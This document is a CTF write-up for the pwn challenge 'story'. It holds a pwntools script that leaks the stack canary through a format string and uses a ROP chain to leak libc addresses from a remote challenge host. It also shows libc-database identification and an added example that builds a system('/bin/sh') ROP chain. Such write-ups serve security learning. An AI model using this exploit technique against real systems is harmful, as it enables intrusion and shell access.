story: leaking the server's libc version

Time: 2023-03-08 16:54:28

A note on a technique I picked up: use an information leak to obtain the addresses of at least two functions in the server's libc, then feed their offsets to libc-database to identify which libc build the server is running.

Link

The leak script is as follows:

from pwn import *

context.log_level = 'DEBUG'

# The port number was lost from the original post; fill in the challenge's port.
PORT = 0
r = remote('ctf2.linkedbyx.com', PORT)
#r = process('./story')
elf = ELF('./story')

# An earlier attempt, left commented out in the original:
'''
rop_chain=
payload='a'*0x90+canary+'b'*+rop_chain
r.sendlineafter('Tell me the size of your story:',payload)
'''
'''
0x0000000000400bd3 : pop rdi ; ret
'''
pop_rdi = 0x0000000000400bd3   # gadget from the ROPgadget output above
main = 0x0000000000400876      # return here after the leak so the binary can be driven again

def leak(sym):
    """Leak the canary through the format string, then overflow the story
    buffer with pop rdi; ret / got[sym] / puts@plt / main to print got[sym]."""
    # %15$p prints the 15th qword on the stack, which is the canary.
    r.sendlineafter(b'Please Tell Your ID:', b'%15$p')
    r.recvuntil(b'Hello ')
    canary = int(r.recv(), 16)     # %p prints hex, so base 16
    success('canary: ' + hex(canary))
    # 0x88 bytes up to the canary, then 8 bytes of saved rbp, then the return address.
    payload  = b'a' * 0x88 + p64(canary) + b'b' * 8
    payload += p64(pop_rdi) + p64(elf.got[sym]) + p64(elf.plt['puts']) + p64(main)
    r.sendlineafter(b':', b'')         # "Tell me the size of your story:"
    r.sendlineafter(b':', payload)     # the story itself: this is the overflow
    # puts prints the GOT entry as raw bytes up to the first NUL, so the address
    # shows up as 6 bytes in the dump; its last three hex digits are what ./find needs.
    raw = r.recv()
    print(raw)
    return raw

leak('read')
# main is re-entered without a new exec, so the canary is unchanged; the
# second round just repeats the same steps for puts.
leak('puts')
r.interactive()

After that, ./find read 250 puts 690 (the last three hex digits of each leaked address) identifies the server's libc. ASLR shifts libc by a multiple of 0x1000, so the low 12 bits of a leaked address equal the low 12 bits of that symbol's offset inside the libc file, and that is all find matches on. A single symbol usually leaves several candidate builds, which is why two functions are leaked.

root@snip3r:~/libc-database# ./find read 250 puts 690
ubuntu-xenial-amd64-libc6 (id libc6_2.-0ubuntu10_amd64)
archive-glibc (id libc6_2.-0ubuntu11_amd64)

Once the libc is known, the base is the leaked address minus that symbol's offset in the identified libc; from the base the addresses of system and the "/bin/sh" string follow, and the final ROP chain can be built directly.
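The following is an added example, not code from the original post or from libc-database: it re-implements offline what ./find does with the two leaks (matching the low 12 bits of each address against a symbol table), shows why read alone is ambiguous while read plus puts is not, then computes the libc base and builds the system("/bin/sh") chain. The candidate table, its libc ids and offsets, and the ASLR base used in demo() are constructed for the example; real offsets come from libc-database's db/*.symbols files. The pop rdi; ret gadget address is the one from the post.

```python
"""Added example: libc identification by page offset, then the final ROP chain.

ASLR relocates libc as a whole by a page-aligned (0x1000) amount, so the low
12 bits of every libc address equal the low 12 bits of that symbol's offset in
the libc file.  libc-database's `find` compares exactly those bits.
"""
import struct

PAGE_MASK = 0xFFF

# Constructed candidate table: libc id -> symbol offsets.  Ids and offsets are
# illustrative, not real database entries.  "libc-alpha" and "libc-beta" share
# read's page offset (0x250), so read alone cannot separate them; puts
# (0x690 vs 0xa30) does.  "libc-gamma" matches puts but not read.
CANDIDATES = {
    "libc-alpha": {"read": 0x0F7250, "puts": 0x06F690, "system": 0x045390, "str_bin_sh": 0x18CD57},
    "libc-beta":  {"read": 0x110250, "puts": 0x080A30, "system": 0x04F4E0, "str_bin_sh": 0x1B3E9A},
    "libc-gamma": {"read": 0x0F8BC0, "puts": 0x070690, "system": 0x046390, "str_bin_sh": 0x18D1C2},
}


def find_libc(leaks, candidates=CANDIDATES):
    """Return the ids of every candidate whose page offsets agree with all leaks.

    leaks: {symbol: leaked absolute address}.  Only addr & 0xfff is compared,
    the same thing `./find sym1 off1 sym2 off2` does with the last three hex digits.
    """
    hits = []
    for libc_id, syms in candidates.items():
        if all(sym in syms and (syms[sym] & PAGE_MASK) == (addr & PAGE_MASK)
               for sym, addr in leaks.items()):
            hits.append(libc_id)
    return hits


def unpack_puts_leak(raw):
    """puts() prints the GOT entry as raw bytes and stops at the first NUL, so a
    userland address (0x00007f...) arrives as 6 bytes; pad to 8 and unpack."""
    raw = raw.rstrip(b"\n")
    if not 1 <= len(raw) <= 8:
        raise ValueError("unexpected leak length %d" % len(raw))
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


def libc_base(leaks, syms):
    """Libc load address from one or more leaks.  Every symbol must yield the
    same page-aligned base, otherwise the identification was wrong."""
    bases = {addr - syms[sym] for sym, addr in leaks.items()}
    if len(bases) != 1:
        raise ValueError("leaks disagree on base: %s" % [hex(b) for b in bases])
    base = bases.pop()
    if base & PAGE_MASK:
        raise ValueError("base 0x%x is not page aligned" % base)
    return base


def build_system_chain(base, syms, pop_rdi_ret, ret_gadget=None):
    """ROP chain for system("/bin/sh"): [ret] | pop rdi; ret | &"/bin/sh" | system.
    ret_gadget is an optional lone `ret` to re-align the stack to 16 bytes,
    which newer libcs need before system (movaps inside do_system)."""
    chain = b""
    if ret_gadget is not None:
        chain += struct.pack("<Q", ret_gadget)
    chain += struct.pack("<Q", pop_rdi_ret)
    chain += struct.pack("<Q", base + syms["str_bin_sh"])
    chain += struct.pack("<Q", base + syms["system"])
    return chain


def demo():
    """Simulate the post's two leaks against libc-alpha loaded at a constructed
    ASLR base, identify it, compute the base, and build the final chain."""
    true_base = 0x7F3A8C2E1000                      # constructed ASLR base
    syms = CANDIDATES["libc-alpha"]
    # What puts(got['read']) and puts(got['puts']) would have printed:
    read_raw = struct.pack("<Q", true_base + syms["read"]).rstrip(b"\x00") + b"\n"
    puts_raw = struct.pack("<Q", true_base + syms["puts"]).rstrip(b"\x00") + b"\n"
    leaks = {"read": unpack_puts_leak(read_raw), "puts": unpack_puts_leak(puts_raw)}

    only_read = find_libc({"read": leaks["read"]})   # ambiguous: two builds
    both = find_libc(leaks)                          # unique
    base = libc_base(leaks, CANDIDATES[both[0]])
    chain = build_system_chain(base, CANDIDATES[both[0]], pop_rdi_ret=0x400BD3)
    return only_read, both, base, chain


if __name__ == "__main__":
    only_read, both, base, chain = demo()
    print("read alone matches:", only_read)
    print("read+puts matches: ", both)
    print("libc base: 0x%x" % base)
    print("chain:", chain.hex())
```

The page-alignment check in libc_base is the cheap sanity test worth keeping in a real exploit: if two leaks taken from the same process give different bases, or a base that is not a multiple of 0x1000, the wrong candidate was picked and the chain would call a garbage address.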